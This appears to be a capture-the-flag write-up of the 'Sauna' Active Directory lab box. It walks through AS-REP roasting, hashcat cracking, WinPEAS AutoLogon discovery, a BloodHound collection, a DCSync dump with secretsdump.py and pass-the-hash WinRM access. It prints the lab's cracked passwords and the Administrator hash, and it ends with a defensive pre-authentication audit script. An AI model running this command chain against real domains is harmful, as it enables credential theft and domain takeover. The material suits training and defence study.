Myles Nieman

Sauna

Overview

Sauna is an easy Windows Active Directory box. The target runs a bank website that lists employee names. Converting those names into likely AD username formats reveals one account — fsmith — with Kerberos pre-authentication disabled, making it AS-REP roastable. Cracking the roasted hash gives a working WinRM login. Once inside, WinPEAS finds autologon credentials for a second account (svc_loanmgr) that BloodHound shows has DCSync rights over the domain. Dumping the Administrator NTLM hash via DCSync allows a pass-the-hash WinRM session as domain admin.

Path: employee name enumeration → AS-REP roasting (fsmith) → WinPEAS autologon creds → svc_loanmgr DCSync → Administrator hash → root.

Enumeration

A full port scan reveals the standard Windows domain controller fingerprint: DNS, Kerberos, LDAP, SMB, WinRM, and IIS on port 80 — with the domain EGOTISTICAL-BANK.LOCAL.

$ nmap -p- -A 10.129.95.180
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn
389/tcp   open  ldap          Microsoft Windows AD LDAP (Domain: EGOTISTICAL-BANK.LOCAL)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows AD LDAP (Domain: EGOTISTICAL-BANK.LOCAL)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (WinRM)
9389/tcp  open  mc-nmf        .NET Message Framing
Service Info: Host: SAUNA; OS: Windows

Nmap output for Sauna confirming EGOTISTICAL-BANK.LOCAL domain controller

Adding EGOTISTICAL-BANK.LOCAL to /etc/hosts, the website shows a public team page listing six employees:

The Egotistical Bank team page listing staff names

  • Fergus Smith
  • Hugo Bear
  • Steven Kerb
  • Shaun Coins
  • Bowie Taylor
  • Sophie Driver

Foothold — AS-REP Roasting

I generated a username wordlist from the six names in common AD formats (first.last, flast, firstl) and ran GetNPUsers.py against the domain to check for accounts with pre-authentication disabled:

$ GetNPUsers.py -usersfile usersMaybe EGOTISTICAL-BANK.LOCAL/ -format hashcat -outputfile hashes.txt

GetNPUsers returning an AS-REP hash for fsmith

fsmith has pre-auth disabled. Cracking the resulting hash against rockyou.txt:

$ hashcat -m 18200 -a 0 hashes.txt /tools/SecLists/Passwords/Leaked-Databases/rockyou.txt

Hashcat cracking the AS-REP hash to recover fsmith’s password

Credentials: fsmith : Thestrokes23

User

With WinRM open, logging in is straightforward:

$ evil-winrm -u fsmith -p 'Thestrokes23' -i EGOTISTICAL-BANK.LOCAL

whoami /all shows fsmith has no interesting privileges beyond the default Remote Management Users membership — no direct path to escalation from here.

Privilege Escalation — Autologon Credentials and DCSync

Running WinPEAS surfaces AutoLogon registry credentials:

WinPEAS revealing autologon credentials for svc_loanmanager

svc_loanmanager : Moneymakestheworldgoround!

Note: the registry entry names the user svc_loanmanager, but the actual AD account is the shorter svc_loanmgr; the recovered password is used with that name from here on. A BloodHound collection using fsmith’s credentials maps the domain graph:

$ python3 /tools/bloodhoundCE-py/bloodhound.py \
    -u fsmith -p "Thestrokes23" \
    -d EGOTISTICAL-BANK.LOCAL -c All --zip \
    -ns 10.129.95.180

BloodHound collection completing successfully

BloodHound shows svc_loanmgr has DCSync rights (DS-Replication-Get-Changes-All):

BloodHound graph showing svc_loanmgr’s DCSync rights over the domain

DCSync lets us impersonate a replicating domain controller and request the NTLM hashes for any account (the secrets held in NTDS.DIT) over the directory replication protocol, without ever touching the file on the DC:

$ secretsdump.py svc_loanmgr:'Moneymakestheworldgoround!'@10.129.95.180 \
    -just-dc-user Administrator
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::

Root

With the Administrator NTLM hash in hand, a pass-the-hash WinRM session gives domain admin access:

$ evil-winrm -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e -i EGOTISTICAL-BANK.LOCAL

Evil-WinRM shell as Administrator via pass-the-hash

Takeaways

  • AS-REP roasting requires only a username list — no prior credentials needed. Accounts with pre-auth disabled are offline crackable and should not exist in production; the fix is enforcing Kerberos pre-authentication for all accounts.
  • AutoLogon credentials in the registry are a common lateral-movement path. WinPEAS reliably surfaces them; once an account with DCSync rights is compromised, the entire domain is effectively owned without touching a Domain Controller interactively.
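As an added defender-side example that is not part of the original writeup, the audit behind the first takeaway: decode userAccountControl, report enabled accounts carrying the DONT_REQ_PREAUTH bit (what made fsmith roastable), and compute the remediated value. The flag values and the LDAP bitwise matching-rule OID are Microsoft's documented ones; the user records and their UAC values are constructed for illustration.

```python
# Added example (not from the writeup): audit userAccountControl for the
# DONT_REQ_PREAUTH bit that made fsmith AS-REP roastable, and compute the
# remediated value. Sample records below are constructed, not from the box.

# userAccountControl bit values as documented by Microsoft for AD user objects.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",  # Kerberos pre-authentication not required
}
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000

# Equivalent LDAP filter for a live query: the bitwise-AND matching rule
# 1.2.840.113556.1.4.803 on userAccountControl (4194304 == 0x400000, 2 == disabled).
ASREP_ROASTABLE_FILTER = (
    "(&(objectCategory=person)(objectClass=user)"
    "(userAccountControl:1.2.840.113556.1.4.803:=4194304)"
    "(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"
)

def decode_uac(value: int) -> list[str]:
    """Names of the known flags set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

def find_asrep_roastable(records: list[dict]) -> list[str]:
    """sAMAccountNames of enabled accounts that do not require pre-authentication."""
    hits = []
    for rec in records:
        uac = rec["userAccountControl"]
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            hits.append(rec["sAMAccountName"])
    return sorted(hits)

def enforce_preauth(uac: int) -> int:
    """Remediated userAccountControl: same flags with DONT_REQ_PREAUTH cleared."""
    return uac & ~DONT_REQ_PREAUTH

# Constructed sample shaped like LDAP search results; UAC values are illustrative.
SAMPLE_USERS = [
    {"sAMAccountName": "fsmith", "userAccountControl": 0x400200},
    {"sAMAccountName": "hbear", "userAccountControl": 0x200},
    {"sAMAccountName": "svc_loanmgr", "userAccountControl": 0x10200},
    {"sAMAccountName": "old_svc", "userAccountControl": 0x400202},  # disabled
]

if __name__ == "__main__":
    print("AS-REP roastable:", find_asrep_roastable(SAMPLE_USERS))
    print("fsmith flags:", decode_uac(0x400200), "fixed:", hex(enforce_preauth(0x400200)))
```

Against a real domain, run ASREP_ROASTABLE_FILTER through your LDAP client of choice and feed the results to find_asrep_roastable; disabled accounts are skipped because they cannot obtain a TGT anyway.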